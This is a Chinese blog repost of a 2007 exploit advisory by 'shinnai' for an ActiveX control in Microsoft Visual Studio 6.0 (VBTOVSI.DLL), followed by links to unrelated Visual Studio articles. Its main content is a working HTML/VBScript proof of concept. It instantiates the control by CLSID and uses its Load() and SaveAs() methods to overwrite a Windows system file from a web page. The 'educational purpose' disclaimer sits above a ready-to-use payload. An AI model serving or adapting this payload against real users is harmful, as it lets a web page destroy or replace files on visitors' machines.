Microsoft Visual Studio 6.0 (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit

原创 2007年09月13日 20:16:00
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">---------------------------------------------------------------------------------------------------------
<b>Microsoft Visual Studio 6.0 VB To VSI Support Library (VBTOVSI.DLL v. 1.0.0.0) Arbitrary File Overwrite</b>
url: http://www.microsoft.com

author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

<b>Description:
Using the "Load()" method we can load the content of a file from local machine passed as argument to
this function and then save it into arbitrary location with the "SaveAs()" method.
This allow to overwrite well known files with arbitrary data. I try to pass to the "Load()" method
remote directories (http) but, unfortunately, it accepts only local directories.</b>
---------------------------------------------------------------------------------------------------------

<object classid='clsid:7EEA39E3-41D1-11D2-AB3B-00AA00BDD685' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language = 'vbscript'>
Sub tryMe()
  test.Load "c:/windows/system32/cmd.exe" 'or just some existing file
  test.SaveAs "c:/windows/system_.ini"
  MsgBox "Exploit completed!"
End Sub
</script>
</span></span>

</code></pre>

 
版权声明:本文为博主原创文章,未经博主允许不得转载。

相关文章推荐

《Microsoft Visual Studio 6.0 Enterprise Edition》

说明:在这里可以下载到如下关于VS6.0所需要的一些内容,如下: ----------------------------------------------------------------...
  • hpwzd
  • hpwzd
  • 2012-04-09 14:10
  • 2653

英文版Microsoft Visual Studio 6.0中, 莫名其妙间,点击“Find in Files”引起的开发环的崩溃问题解析:

我一共遇到两次:第一次(2010年某月):查了好多资料在“http://www.vckbase.com/bbs/”中问了,回答多数是:1)中病毒2)别人删减了,安装不全3)卸载,重装解决办法:重装操作...

Microsoft Visual studio 2015 C 程序项目建立和缺失ucrtbased.dll的解决办法

Microsoft Visual studio 2015 C 程序项目建立和缺失ucrtbased.dll的解决办法

microsoft visual studio c++ 6.0

  • 2013-04-17 12:53
  • 30.28MB
  • 下载

Exporting a function in a DLL using Microsoft Visual C++ 6.0

Background There is a function written in C (not necessarily in C++). The function is a part of t...

microsoft visual studio 2008下的SQLserver2005配置

今天自学到ASP.NET中的GridView控件,需要用到数据库,我装的是VS2008,安装的时候自带安装了SQL SERVER 2005,但是,貌似只是简单的安装了一个配置工具, 并没有安装sql ...

Microsoft Visual Studio与Firefly 一直提示加载项目,更新源码状态问题

笔记本一开始安装的是vs2010,由于近期开发要用vs2008与vs2005于是今天又把2008、2005安装上了,但在打开项目的时候,先是提示加载项目文件,然后一直提示更新源码状态,很慢很慢的,之前...

2011-04-21 12:17 让Eclipse,MyEclipse拥有Microsoft Visual Studio那样的自动提示功能

一般默认情况下,Eclipse ,MyEclipse 的代码提示功能是比Microsoft Visual Studio的差很多的,主要是Eclipse ,MyEclipse本身有很多选项是默认关闭的,...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)